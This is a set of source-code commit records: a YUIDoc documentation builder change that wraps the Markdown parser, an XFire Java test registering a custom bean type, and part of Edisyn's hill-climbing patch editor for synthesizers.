((p.optdefault) ? '=' + p.optdefault : '') + ']' } i.paramsList.push(name); }); } //i.methodDescription = self._parseCode(markdown(i.description || '')); i.methodDescription = self._parseCode(i.description); if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } i.hasAccessType = i.access; i.hasParams = i.paramsList.length; if (i.paramsList.length) { i.paramsList = i.paramsList.join(', '); } else { i.paramsList = ' '; } i.returnType = ' '; if (i.return) { i.hasReturn = true; i.returnType = i.return.type; } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.methods.push(i); break; case 'property': i = self.augmentData(i); //i.propertyDescription = self._parseCode(markdown(i.description || '')); i.propertyDescription = self._parseCode(i.description); if (!i.type) { i.type = 'unknown'; } if (i.final === '') { i.final = true; } if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. 
if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.properties.push(i); break; case 'attribute': // fallthru case 'config': i = self.augmentData(i); //i.attrDescription = self._parseCode(markdown(i.description || '')); i.attrDescription = self._parseCode(i.description); if (i.itemtype === 'config') { i.config = true; } else { i.emit = self.options.attributesEmit; } if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.attrs.push(i); break; case 'event': i = self.augmentData(i); //i.eventDescription = self._parseCode(markdown(i.description || '')); i.eventDescription = self._parseCode(i.description); if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.events.push(i); break; } }); opts.meta.attrs.sort(self.nameSort); opts.meta.events.sort(self.nameSort); opts.meta.methods.sort(self.nameSort); opts.meta.properties.sort(self.nameSort); if (!opts.meta.methods.length) { delete opts.meta.methods; } if (!opts.meta.properties.length) { delete opts.meta.properties; } if (!opts.meta.attrs.length) { delete opts.meta.attrs; } if (!opts.meta.events.length) { delete opts.meta.events; } var view = new Y.DocView(opts.meta); var mainLayout = opts.layouts[layout]; self.render('{{>classes}}', view, mainLayout, opts.partials, stack.add(function(err, html) { self.files++; stack.html = html; stack.view = view; })); }); stack.done(function() { cb(stack.html, stack.view); }); }, /** * Generates the class files under "out"/classes/ * @method writeClasses * @param {Callback} cb The callback to execute after it's completed */ writeClasses: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.classes).length + ' class pages.', 'info', 'builder'); Y.each(self.data.classes, function(v) { if (v.external) { return } self.renderClass(stack.add(function(html, view) { stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'classes_' + v.name + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'classes', v.name + '.html'), html, stack.add(noop)); }), v, layout); }); stack.done(function() { Y.log('Finished writing class files', 'info', 'builder'); cb(stack.html, stack.view); }); }, /** * Sort method of array of objects with a property called __name__ * @method nameSort * @param {Object} a First object to compare * 
@param {Object} b Second object to compare * @return {Number} 1, -1 or 0 for sorting. */ nameSort: function(a, b) { if (!a.name || !b.name) { return 0; } var an = a.name.toLowerCase(), bn = b.name.toLowerCase(), ret = 0; if (an < bn) { ret = -1; } if (an > bn) { ret = 1 } return ret; }, /** * Generates the syntax files under `"out"/files/` * @method writeFiles * @param {Callback} cb The callback to execute after it's completed */ writeFiles: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.files).length + ' source files.', 'info', 'builder'); Y.each(self.data.files, function(v) { if (v.external) { return } self.renderFile(stack.add(function(html, view, data) { if (!view || !data) { return; } stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'files_' + self.filterFileName(data.name) + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'files', self.filterFileName(data.name) + '.html'), html, stack.add(noop)); }), v, layout); }); stack.done(function() { Y.log('Finished writing source files', 'info', 'builder'); cb(stack.html, stack.view); }); }, renderFile: function(cb, data, layout) { var self = this; Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { if (err) { console.log(err); } if (!data.name) { return; } opts.meta = Y.merge(opts.meta, data); opts.meta.title = self.data.project.name; opts.meta.moduleName = data.name; opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); opts.meta.fileName = data.name; fs.readFile(opts.meta.fileName, 'utf8', Y.rbind(function(err, str, opts, data) { if (err) { Y.log(err, 'error', 'builder'); cb(err); return; } opts.meta.fileData = str; var view = new Y.DocView(opts.meta, 'index'); var mainLayout = opts.layouts[layout]; self.render('{{>files}}', view, mainLayout, opts.partials, function(err, html) { self.files++; cb(html, view, data); }); }, this, opts, data)); }); }, writeAPIMeta: function(cb) { Y.log('Writing API Meta Data', 'info', 'builder'); var self = this; this.renderAPIMeta(function(js) { fs.writeFile(path.join(self.options.outdir, 'api.js'), js, 'utf8', cb); }); }, renderAPIMeta: function(cb) { var opts = { meta: {} }, self = this; opts = this.populateClasses(opts); opts = this.populateModules(opts); ['classes', 'modules'].forEach(function(id) { opts.meta[id].forEach(function(v, k) { opts.meta[id][k] = v.name; if (v.submodules) { v.submodules.forEach(function(s) { opts.meta[id].push(s.displayName); }); } }); opts.meta[id].sort(); }); var apijs = 'YUI.add("yuidoc-meta", function(Y) {\n' + ' Y.YUIDoc = { meta: ' + JSON.stringify(opts.meta, null, 4) + ' };\n' + '});'; cb(apijs); }, /** * Normalizes a file path to a writable filename: * * var path = 'lib/file.js'; * returns 'lib_file.js'; * * @method filterFileName * @param {String} f The filename to normalize * @return {String} The filtered file path */ filterFileName: function(f) { return f.replace(/[\/\\]/g, '_'); }, /** * Compiles the templates from the meta-data provided by DocParser * @method compile * @param {Callback} cb The callback to execute after it's completed */ compile: function(cb) { var self = this; var starttime = (new Date()).getTime(); Y.log('Compiling Templates', 'info', 
'builder'); this.mixExternal(function() { self.makeDirs(function() { Y.log('Copying Assets', 'info', 'builder'); if (!Y.Files.isDirectory(path.join(self.options.outdir, 'assets'))) { fs.mkdirSync(path.join(self.options.outdir, 'assets'), 0777); } Y.Files.copyAssets([path.join(DEFAULT_THEME, 'assets'), path.join(themeDir, 'assets')], path.join(self.options.outdir, 'assets'), false, function() { var cstack = new Y.Parallel(); self.writeModules(cstack.add(function() { self.writeClasses(cstack.add(function() { if (!self.options.nocode) { self.writeFiles(cstack.add(noop)); } })); })); self.writeIndex(cstack.add(noop)); self.writeAPIMeta(cstack.add(noop)); cstack.done(function() { var endtime = (new Date()).getTime(); var timer = ((endtime - starttime) / 1000) + ' seconds'; Y.log('Finished writing ' + self.files + ' files in ' + timer, 'info', 'builder'); if (cb) { cb(); } }); }); }); }); } } });
Added a factory for MD parsing to experiment with alternative parsers.
lib/builder.js
Added a factory for MD parsing to experiment with alternative parsers.
<ide><path>ib/builder.js <ide> Code licensed under the BSD License: <ide> http://yuilibrary.com/license/ <ide> */ <del>var markdown = require("node-markdown").Markdown, <add>var MD = require("node-markdown").Markdown, <ide> fs = require('graceful-fs'), <ide> noop = function() {}, <ide> path = require('path'), <ide> } <ide> <ide> return t; <add> }, <add> /** <add> * Wrapper around the Markdown parser so it can be normalized or even side stepped <add> * @method markdown <add> * @private <add> * @param {String} md The Markdown string to parse <add> * @param {Boolean} def Only allow default set of HTML tags <add> * @param {Array} tags An array of tags to allow <add> * @return {HTML} The rendered HTML <add> */ <add> markdown = function(md, def, tags) { <add> html = MD(md, def, tags); <add> return html; <ide> }; <ide> <ide> /**
Java
mit
error: pathspec 'xfire-aegis/src/test/org/codehaus/xfire/aegis/example/CustomTypeTest.java' did not match any file(s) known to git
dedb6f6a963f0ae5602acfc1ec928e28ad399d58
1
eduardodaluz/xfire,eduardodaluz/xfire
package org.codehaus.xfire.aegis.example; import javax.xml.namespace.QName; import org.codehaus.xfire.aegis.AbstractXFireAegisTest; import org.codehaus.xfire.aegis.AegisBindingProvider; import org.codehaus.xfire.aegis.type.TypeMapping; import org.codehaus.xfire.aegis.type.basic.BeanType; import org.codehaus.xfire.service.Service; import org.codehaus.xfire.service.binding.ObjectServiceFactory; import org.codehaus.xfire.services.BeanService; import org.codehaus.xfire.services.SimpleBean; import org.codehaus.xfire.soap.SoapConstants; import org.codehaus.xfire.wsdl.WSDLWriter; import org.jdom.Document; /** * @author <a href="mailto:[email protected]">peter royal</a> */ public class CustomTypeTest extends AbstractXFireAegisTest { public void testBeanService() throws Exception { // START SNIPPET: types ObjectServiceFactory osf = (ObjectServiceFactory) getServiceFactory(); AegisBindingProvider provider = (AegisBindingProvider) osf.getBindingProvider(); TypeMapping tm = provider.getTypeMappingRegistry().getDefaultTypeMapping(); // Create your custom type BeanType type = new BeanType(); type.setTypeClass(SimpleBean.class); type.setSchemaType(new QName("urn:ReallyNotSoSimpleBean", "SimpleBean")); // register the type tm.register(type); Service service = getServiceFactory().create(BeanService.class); getServiceRegistry().register(service); // END SNIPPET: types final Document response = invokeService("BeanService", "/org/codehaus/xfire/message/wrapped/WrappedCustomTypeTest.bean11.xml"); addNamespace("sb", "http://services.xfire.codehaus.org"); assertValid("/s:Envelope/s:Body/sb:getSubmitBeanResponse", response); assertValid("//sb:getSubmitBeanResponse/sb:out", response); assertValid("//sb:getSubmitBeanResponse/sb:out[text()=\"blah\"]", response); final Document doc = getWSDLDocument("BeanService"); addNamespace("wsdl", WSDLWriter.WSDL11_NS); addNamespace("wsdlsoap", WSDLWriter.WSDL11_SOAP_NS); addNamespace("xsd", SoapConstants.XSD); assertValid("/wsdl:definitions/wsdl:types", doc); assertValid("/wsdl:definitions/wsdl:types/xsd:schema", doc); assertValid("/wsdl:definitions/wsdl:types/xsd:schema[@targetNamespace='http://services.xfire.codehaus.org']", doc); assertValid( "//xsd:schema[@targetNamespace='http://services.xfire.codehaus.org']/xsd:element[@name='getSubmitBean']", doc); assertValid( "//xsd:element[@name='getSubmitBean']/xsd:complexType/xsd:sequence/xsd:element[@name='in1'][@type='xsd:string']", doc); assertValid( "//xsd:element[@name='getSubmitBean']/xsd:complexType/xsd:sequence/xsd:element[@name='in0'][@type='ns1:SimpleBean']", doc); assertValid("/wsdl:definitions/wsdl:types" + "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + "/xsd:complexType", doc); assertValid("/wsdl:definitions/wsdl:types" + "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + "/xsd:complexType[@name=\"SimpleBean\"]", doc); assertValid("/wsdl:definitions/wsdl:types" + "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@name=\"bleh\"]", doc); assertValid("/wsdl:definitions/wsdl:types" + "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@name=\"howdy\"]", doc); assertValid("/wsdl:definitions/wsdl:types" + "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@type=\"xsd:string\"]", doc); assertValid( 
"/wsdl:definitions/wsdl:service/wsdl:port/wsdlsoap:address[@location='http://localhost/services/BeanService']", doc); } }
xfire-aegis/src/test/org/codehaus/xfire/aegis/example/CustomTypeTest.java
Show how to create a custom type git-svn-id: 9326b53cbc4a8f4c3d02979b62b178127d5150fe@952 c7d0bf07-ec0d-0410-b2cc-d48fa9be22ba
xfire-aegis/src/test/org/codehaus/xfire/aegis/example/CustomTypeTest.java
Show how to create a custom type
<ide><path>fire-aegis/src/test/org/codehaus/xfire/aegis/example/CustomTypeTest.java <add>package org.codehaus.xfire.aegis.example; <add> <add>import javax.xml.namespace.QName; <add> <add>import org.codehaus.xfire.aegis.AbstractXFireAegisTest; <add>import org.codehaus.xfire.aegis.AegisBindingProvider; <add>import org.codehaus.xfire.aegis.type.TypeMapping; <add>import org.codehaus.xfire.aegis.type.basic.BeanType; <add>import org.codehaus.xfire.service.Service; <add>import org.codehaus.xfire.service.binding.ObjectServiceFactory; <add>import org.codehaus.xfire.services.BeanService; <add>import org.codehaus.xfire.services.SimpleBean; <add>import org.codehaus.xfire.soap.SoapConstants; <add>import org.codehaus.xfire.wsdl.WSDLWriter; <add>import org.jdom.Document; <add> <add>/** <add> * @author <a href="mailto:[email protected]">peter royal</a> <add> */ <add>public class CustomTypeTest <add> extends AbstractXFireAegisTest <add>{ <add> public void testBeanService() <add> throws Exception <add> { <add> // START SNIPPET: types <add> ObjectServiceFactory osf = (ObjectServiceFactory) getServiceFactory(); <add> AegisBindingProvider provider = (AegisBindingProvider) osf.getBindingProvider(); <add> TypeMapping tm = provider.getTypeMappingRegistry().getDefaultTypeMapping(); <add> <add> // Create your custom type <add> BeanType type = new BeanType(); <add> type.setTypeClass(SimpleBean.class); <add> type.setSchemaType(new QName("urn:ReallyNotSoSimpleBean", "SimpleBean")); <add> <add> // register the type <add> tm.register(type); <add> <add> Service service = getServiceFactory().create(BeanService.class); <add> <add> getServiceRegistry().register(service); <add> <add> // END SNIPPET: types <add> <add> final Document response = <add> invokeService("BeanService", <add> "/org/codehaus/xfire/message/wrapped/WrappedCustomTypeTest.bean11.xml"); <add> <add> addNamespace("sb", "http://services.xfire.codehaus.org"); <add> assertValid("/s:Envelope/s:Body/sb:getSubmitBeanResponse", response); <add> assertValid("//sb:getSubmitBeanResponse/sb:out", response); <add> assertValid("//sb:getSubmitBeanResponse/sb:out[text()=\"blah\"]", response); <add> <add> final Document doc = getWSDLDocument("BeanService"); <add> <add> addNamespace("wsdl", WSDLWriter.WSDL11_NS); <add> addNamespace("wsdlsoap", WSDLWriter.WSDL11_SOAP_NS); <add> addNamespace("xsd", SoapConstants.XSD); <add> <add> assertValid("/wsdl:definitions/wsdl:types", doc); <add> assertValid("/wsdl:definitions/wsdl:types/xsd:schema", doc); <add> assertValid("/wsdl:definitions/wsdl:types/xsd:schema[@targetNamespace='http://services.xfire.codehaus.org']", <add> doc); <add> assertValid( <add> "//xsd:schema[@targetNamespace='http://services.xfire.codehaus.org']/xsd:element[@name='getSubmitBean']", <add> doc); <add> assertValid( <add> "//xsd:element[@name='getSubmitBean']/xsd:complexType/xsd:sequence/xsd:element[@name='in1'][@type='xsd:string']", <add> doc); <add> assertValid( <add> "//xsd:element[@name='getSubmitBean']/xsd:complexType/xsd:sequence/xsd:element[@name='in0'][@type='ns1:SimpleBean']", <add> doc); <add> <add> assertValid("/wsdl:definitions/wsdl:types" + <add> "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + <add> "/xsd:complexType", doc); <add> assertValid("/wsdl:definitions/wsdl:types" + <add> "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + <add> "/xsd:complexType[@name=\"SimpleBean\"]", doc); <add> assertValid("/wsdl:definitions/wsdl:types" + <add> "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + <add> 
"/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@name=\"bleh\"]", doc); <add> assertValid("/wsdl:definitions/wsdl:types" + <add> "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + <add> "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@name=\"howdy\"]", doc); <add> assertValid("/wsdl:definitions/wsdl:types" + <add> "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + <add> "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@type=\"xsd:string\"]", doc); <add> <add> assertValid( <add> "/wsdl:definitions/wsdl:service/wsdl:port/wsdlsoap:address[@location='http://localhost/services/BeanService']", <add> doc); <add> } <add>}
Java
apache-2.0
9b039c39310adac65d2afe269dbf644ae7f97a2c
0
eclab/edisyn,eclab/edisyn,eclab/edisyn
/*** Copyright 2017 by Sean Luke Licensed under the Apache License version 2.0 */ package edisyn; import edisyn.synth.*; import edisyn.nn.*; import edisyn.gui.*; import javax.swing.*; import javax.swing.event.*; import javax.swing.border.*; import java.awt.*; import java.awt.event.*; import java.util.*; import java.io.*; /*** Procedure: Menu -> Start Hill-Climb [or Menu -> Reset Hill-Climb if already started] Creates Hill-Climb Panel and Resets it to current patch Menu -> Stop Hill-Climb Deletes Hill-Climb Panel Each sound has: 1. Done (or Keep?) -> Deletes Hill-Climb Panel and sets current patch to this sound [probably requires double-check dialog panel] 2. Try -> Sends sound to current patch 3. Best / Second Best / Third Best The Panel also has: 1. Iterate 2. Rate 3. Backup Hill-Climbing variations ***/ public class HillClimb extends SynthPanel { // OPERATIONS public static final int OPERATION_SEED_FROM_PATCH = 0; public static final int OPERATION_SEED_FROM_MORPH = 1; public static final int OPERATION_SEED_FROM_NUDGE = 2; public static final int OPERATION_SEED_FROM_FOUR = 3; public static final int OPERATION_SEED_FROM_SIX = 4; public static final int OPERATION_SEED_FROM_LIBRARIAN = 100; public static final int OPERATION_CLIMB = 4; public static final int OPERATION_CONSTRICT = 5; public static final int OPERATION_CLIMB_NN = 6; // HILL CLIMBING AND CONSTRICTION RATES // Note that the mutation rates go 0...100 inclusive, ints public static final int INITIAL_HILL_CLIMB_RATE = 37; // roughly 5 when we do weight^3 public static final int INITIAL_CONSTRICT_RATE = 0; // Note that the recombination rates go 0.0...1.0 inclusive, doubles public static final double CLIMB_RECOMBINATION_RATE = 0.75; public static final double CONSTRICT_RECOMBINATION_RATE = 0.75; /// HILL CLIMBING STACK class State { Model[] parents; int[] parentIndices; boolean[] parentsSelected; Model[] children; int operation; } // The stack proper ArrayList stack = new ArrayList(); /// NUMBER OF CANDIDATE SOLUTIONS public static final int NUM_CANDIDATES = 32; /// Candidates are divided into STAGES of 16 each. The mutation/recombionation procedures use the stage to determine how much mutation to do public static final int STAGE_SIZE = 16; // Size of the archive. We might make this bigger later. public static final int ARCHIVE_SIZE = 6; // There are more models than candidates: #17 is the current Model public static final int NUM_MODELS = NUM_CANDIDATES + ARCHIVE_SIZE + 1; // models currently being played and displayed Model[] currentModels = new Model[NUM_MODELS]; // the most recent procedure performed (see OPERATIONS above) int operation; // The ratings buttons, in the form ratings[candidate][rating] JRadioButton[][] ratings = new JRadioButton[NUM_MODELS + 1][3]; // The selection checkboxes, in the form selected[candidate]. Note that the only candidates are the actual candidates, not archives etc. JCheckBox[] selected = new JCheckBox[NUM_CANDIDATES]; // The play buttons, in the form plays[candidate] PushButton[] plays = new PushButton[NUM_MODELS]; // An empty synth used to store the hillclimbing and constriction model parameters, // since they can't be stored in the regular synth. Blank blank; // "Iteration 123" Category iterations; // Which sound is currently scheduled to be playing in the regular iteration int currentPlay = 0; // Which sound, if any, is currently playing because the user interrupted the regular iteration by pressing the sound's play button. 
// If no such sound, this is -1 int temporaryPlay = -1; // Climb button PushButton climb; // Constrict button. Notice that this is different from Climb PushButton constrict; // Climb mutation weights LabelledDial hillClimbRate; // Constriction mutation weights. Notice that this is different from Climb LabelledDial constrictRate; // Retry button PushButton retry; // Reset button PushButton reset; // Back button PushButton back; // Bigger checkbox JCheckBox bigger; // Box holding the hillcimber button and dial VBox hillClimbBox; // Box holding the constrictor button and dial VBox constrictBox; // Box holding either the hillClimbBox or the constrictBox. Needs to be occasionally revalidated. VBox outerBox; // List of climbing methods JComboBox method; // First 16 candidates VBox extraCandidates1; // Next 16 candidates VBox extraCandidates2; // holds either extraCandidates1 or extraCandidates1 + extraCandidates2 VBox candidates; boolean startSoundsAgain = false; public static final int NO_MENU_BUTTON = -1; int menuButton = NO_MENU_BUTTON; public void setToCurrentPatch() { if (menuButton != NO_MENU_BUTTON) { currentModels[menuButton] = synth.getModel().copy(); currentPlay = menuButton; menuButton = NO_MENU_BUTTON; if (startSoundsAgain) { synth.doSendTestNotes(); startSoundsAgain = false; } } } State popStack() { if (stack.size() == 0) return null; else return (State)(stack.remove(stack.size() - 1)); } void pushStack(int[] parentIndices, Model[] parents, boolean[] parentsSelected, Model[] children) { State state = new State(); state.parents = new Model[parents.length]; state.parentIndices = new int[parents.length]; state.parentsSelected = new boolean[parentsSelected.length]; state.operation = operation; for(int i = 0; i < parents.length; i++) { state.parents[i] = copy(parents[i]); state.parentIndices[i] = parentIndices[i]; state.parentsSelected[i] = parentsSelected[i]; } for(int i = 0; i < parentsSelected.length; i++) { state.parentsSelected[i] = parentsSelected[i]; } state.children = new Model[children.length]; for(int i = 0; i < children.length; i++) { state.children[i] = copy(children[i]); } stack.add(state); } State topStack() { if (stack.size() == 0) return null; else return (State)(stack.get(stack.size() - 1)); } boolean stackEmpty() { return (stack.size() == 0); } boolean stackInitial() { return (stack.size() == 1); } String titleForButton(int _i) { return "Play " + (_i < 16 ? (char)('a' + _i) : (_i < NUM_CANDIDATES ? (char)('A' + (_i - 16)) : (_i < NUM_MODELS - 1 ? (char)('q' + (_i - NUM_CANDIDATES)) : 'z'))); } VBox buildCandidate(int i) { final int _i = i; VBox vbox = new VBox(); plays[_i] = new PushButton(titleForButton(i)) { public void perform() { if (synth.isSendingTestNotes()) { temporaryPlay = _i; } else { for(int j = 0; j < NUM_MODELS; j++) { plays[j].getButton().setForeground(new JButton().getForeground()); plays[j].getButton().setText(titleForButton(j)); } plays[_i].getButton().setForeground(Color.RED); plays[_i].getButton().setText("<HTML><B>" + titleForButton(_i) + "</b></HTML>"); // change the model, send all parameters, maybe play a note, // and then restore the model. 
Model backup = synth.model; synth.model = currentModels[_i]; synth.sendAllParameters(); synth.doSendTestNote(); synth.model = backup; temporaryPlay = _i; } } }; plays[i].getButton().setFocusable(false); vbox.add(plays[i]); HBox hh = new HBox(); VBox vv = new VBox(); Box b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][0] = new JRadioButton("1")); ratings[i][0].setFocusable(false); ratings[i][0].setForeground(Style.TEXT_COLOR()); ratings[i][0].setFont(Style.SMALL_FONT()); ratings[i][0].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][0].setOpaque(false); // for windows vv.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][1] = new JRadioButton("2")); ratings[i][1].setFocusable(false); ratings[i][1].setForeground(Style.TEXT_COLOR()); ratings[i][1].setFont(Style.SMALL_FONT()); ratings[i][1].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][1].setOpaque(false); // for windows b.add(Box.createGlue()); vv.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][2] = new JRadioButton("3")); ratings[i][2].setFocusable(false); ratings[i][2].setForeground(Style.TEXT_COLOR()); ratings[i][2].setFont(Style.SMALL_FONT()); ratings[i][2].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][2].setOpaque(false); // for windows b.add(Box.createGlue()); vv.add(b); hh.add(vv); vv = new VBox(); if (i < NUM_CANDIDATES) { selected[i] = new JCheckBox(""); selected[i].setFocusable(false); selected[i].setForeground(Style.TEXT_COLOR()); selected[i].setOpaque(false); // for windows selected[i].setFont(Style.SMALL_FONT()); selected[i].setSelected(true); selected[i].putClientProperty("JComponent.sizeVariant", "small"); vv.add(selected[i]); } hh.add(vv); vbox.add(hh); JMenuItem[] doItems = new JMenuItem[17]; doItems[0] = new JMenuItem("Keep Patch"); doItems[0].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { // Keep for sure? //if (synth.showSimpleConfirm("Keep Patch", "Load Patch into Editor?")) { synth.tabs.setSelectedIndex(0); synth.setSendMIDI(false); // push to undo if they're not the same if (!currentModels[_i].keyEquals(synth.getModel())) synth.undo.push(synth.getModel()); // Load into the current model currentModels[_i].copyValuesTo(synth.getModel()); synth.setSendMIDI(true); synth.sendAllParameters(); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[0].setEnabled(false); doItems[1] = new JMenuItem("Edit in New Editor"); doItems[1].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Synth newSynth = synth.doDuplicateSynth(); // Copy the parameters forward into the synth, then // link the synth's model back to currentModels[_i]. // We do this because the new synth's widgets are registered // with its model, so we can't just replace the model. // But we can certainly replace currentModels[_i]! newSynth.setSendMIDI(false); currentModels[_i].copyValuesTo(newSynth.getModel()); newSynth.setSendMIDI(true); currentModels[_i] = newSynth.getModel(); newSynth.sendAllParameters(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[1].setEnabled(false); doItems[2] = new JMenuItem("Save to File"); doItems[2].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Model backup = synth.model; synth.model = currentModels[_i]; synth.doSaveAs("" + stack.size() + "." 
+ (_i < NUM_CANDIDATES ? (_i + 1) : ("A" + (_i - NUM_CANDIDATES + 1))) + "." + synth.getPatchName(synth.getModel()) + ".syx"); synth.model = backup; synth.updateTitle(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[2].setEnabled(false); doItems[3] = null; doItems[4] = new JMenuItem("Request Current Patch"); doItems[4].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { if (synth.receiveCurrent.isEnabled()) { menuButton = _i; startSoundsAgain = false; // we do this because some synths send data in chunks and in-between those // chunks we may send current patch and play it, messing up the chunk (such as on the JV-880) if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); startSoundsAgain = true; } synth.doRequestCurrentPatch(); // Notice we do NOT do updateAgain(); but we'll do it when the patch comes in } else { synth.showSimpleError("Cannot Request Current Patch", "This synthesizer does not support requesting the current patch (sorry)."); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[4].setEnabled(false); doItems[5] = new JMenuItem("Request Patch..."); doItems[5].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { if (synth.receivePatch.isEnabled()) { menuButton = _i; startSoundsAgain = false; // we do this because some synths send data in chunks and in-between those // chunks we may send current patch and play it, messing up the chunk (such as on the JV-880) if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); startSoundsAgain = true; } synth.doRequestPatch(); // Notice we do NOT do updateAgain(); but we'll do it when the patch comes in } else { synth.showSimpleError("Cannot Request Patch", "This synthesizer does not support requesting a patch (sorry)."); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[5].setEnabled(false); doItems[6] = new JMenuItem("Load from File..."); doItems[6].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Model backup = synth.model; synth.model = currentModels[_i]; synth.setShowingLimitedBankSysex(true); synth.doOpen(false); synth.setShowingLimitedBankSysex(false); currentModels[_i] = synth.model; synth.model = backup; synth.updateTitle(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[6].setEnabled(false); doItems[7] = new JMenuItem("Copy from Morph"); doItems[7].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { synth.setSendMIDI(false); synth.morph.current.copyValuesTo(currentModels[_i]); synth.setSendMIDI(true); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[7].setEnabled(false); doItems[8] = null; doItems[9] = new JMenuItem("Nudge Candidates to Me"); doItems[9].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Random random = synth.random; String[] keys = synth.getMutationKeys(); for(int i = 0; i < NUM_CANDIDATES; i++) { if (i == _i) continue; currentModels[i].recombine(random, currentModels[_i], keys, synth.nudgeRecombinationWeight).mutate(random, keys, synth.nudgeMutationWeight); } } }); doItems[10] = null; doItems[11] = new JMenuItem("Archive to q"); doItems[11].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 0] = (Model)(currentModels[_i].clone()); } }); doItems[12] = new JMenuItem("Archive to r"); doItems[12].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 1] = 
